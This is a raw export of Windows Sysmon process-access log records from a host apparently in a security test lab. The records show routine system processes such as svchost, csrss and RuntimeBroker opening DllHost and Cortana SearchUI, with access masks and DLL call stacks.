12:09:53.626{266CAFBE-646C-6064-1000-00000000AE01}11242204C:\Windows\system32\svchost.exe{266CAFBE-6691-6064-7501-00000000AE01}4004C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.626{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-6691-6064-7501-00000000AE01}4004C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.610{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6691-6064-7501-00000000AE01}4004C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.610{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6691-6064-7501-00000000AE01}4004C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.610{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6691-6064-7501-00000000AE01}4004C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.610{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6691-6064-7501-00000000AE01}4004C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.610{266CAFBE-64C4-6064-9B00-00000000AE01}49246424C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.onecore.dll+1602f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.610{266CAFBE-64C4-6064-9B00-00000000AE01}49246424C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.onecore.dll+1717e|C:\Windows\system32\windows.cortana.onecore.dll+15fb7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000011056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.610{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.610{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.595{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.595{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.595{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.595{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.595{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.595{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.595{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.595{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.438{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.438{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.438{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.438{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
